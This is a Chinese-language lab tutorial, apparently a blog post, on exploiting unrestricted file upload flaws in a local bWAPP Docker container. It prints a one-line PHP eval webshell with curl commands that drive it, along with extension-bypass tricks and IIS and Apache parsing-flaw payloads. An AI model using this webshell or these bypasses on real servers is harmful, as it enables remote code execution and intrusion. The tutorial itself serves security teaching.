文件上传漏洞是什么?
文件上传漏洞是在开发者没有做充足验证情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者webshell等。
部署靶机环境
下载镜像
docker search bwapp # 搜索镜像
docker pull raesene/bwapp # 拉取镜像
docker run -d -p 12345:80 raesene/bwapp # 创建容器
docker ps # 确认容器是否正常运行
docker container list -a|grep bwapp # 查看容器id
docker start container_id # 启动容器,如果容器已经启动,就无需这部操作
docker exec -it container_id bash # 进入容器,修改文件的权限,否在无法上传文件
在进入容器之后,需要对文件的目录权限进行变更,否则无法进行上传操作
root@137640210dd6:/app# cd ..
root@137640210dd6:/# chown -R www-data:www-data app
系统初始化
在浏览器中输入http://localhost:12345/install.php,进入安全页面,选择安装按钮,对应用进行初始化。
image.png
创建用户
在初始化成功之后,跳转到create user页面,填写完信息之后,不要勾选验证邮件这一项,点击创建:
image.png
文件上传
上传漏洞
登录应用之后,选择Unrestricted File Upload 然后点击hack按钮,进入Unrestricted File Upload 页面,
image.png
上传一个文件shell.php文件,并进行查看,在预览页面中没有任何内容展示,因为上传的文件不是一个文本文件,而是一个文件,文件内容为:
<?php @eval($_POST['hacker']); ?>%
在php中,eval是一个特殊的关键字,将一个字符串变成php的运行代码。
<?php @eval($_POST['hacker']); ?> 中的@eval($_POST['hacker']);是要接收post的数据,变量为hacker
image.png
curl -d "hacker=echo get_current_user();" http://localhost:12345/images/shell.php # 获取当前用户
curl -d "hacker=echo getcwd();" http://localhost:12345/images/shell.php # 获取当前的目录
后缀名跳过
将安全级别设置为medium,将无法上传shell.php文件:
image.png
将shell.php 变成shell.php3,在重新上传文件:
image.png
文件成功上传
image.png
将shell.php 变成shell.php30,在重新上传文件:
image.png
文件内容可以在预览里面看见,因为应用把shell.php30当作一个文本文件,直接展示内容。
查看容器内部的文件:
docker container list -a|grep bwapp # 查看容器id
docker exec -it container_id bash # 进入容器,修改文件的权限,否在无法上传文件
cd /etc/apache2/
cat apache2.conf |grep conf
通过apache2.conf文件中,可以看到加载的mod有哪些,查看支持的php配置文件位置和内容
cd /etc/apache2/mods-enabled
cat php5.conf
php5.conf文件内容
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
Order Deny,Allow
Deny from all
</FilesMatch>
<FilesMatch "^\.ph(p[345]?|t|tml|ps)$">
Order Deny,Allow
Deny from all
</FilesMatch>
<IfModule mod_userdir.c>
<Directory /home/*/public_html>
php_admin_flag engine Off
</Directory>
</IfModule>
通过配置文件可以看到,如果后缀名字为php3、php4、php5都会解析为PHP文件,php30是无法解析为php文件的。
前端绕过
ISS 5.x/6 解析漏洞
漏洞1:当创建.asp的文件目录的时候,在此目录下的任意文件,服务器都解析为asp文件
漏洞2:服务器默认不解析;以后的内容
漏洞利用形式:
漏洞1: www.xx.com/xx.asp/xx.jpg 会被解析成asp文件
漏洞2: www.xx.com/xx.asp;.jpg 会被解析为asp文件
Apache漏洞
Apache 在1.x和2.x版本中存在解析漏洞:
Apache从右至左开始判断后缀,跳过非可识别后缀,直到找到可识别后缀为止,
然后将该可识别后缀进解析。
前端验证绕过
利用方式:
1.使用Burp Suite来拦截请求,将请求进行修改;
2.通过chrome禁止/删除js代码。
Windows文件流
什么是Windows文件流?
NTFS文件系统实现了多文件流特性,NTFS环境一个文件默认使用的是未命名的文件流,同时可创建其他命名的文件流,Windows资源管理器默认不显示出文件的命名文件流,这些命名的文件流在功能上和默认使用的未命名文件流一致,甚至可以用来启动程序。
网友评论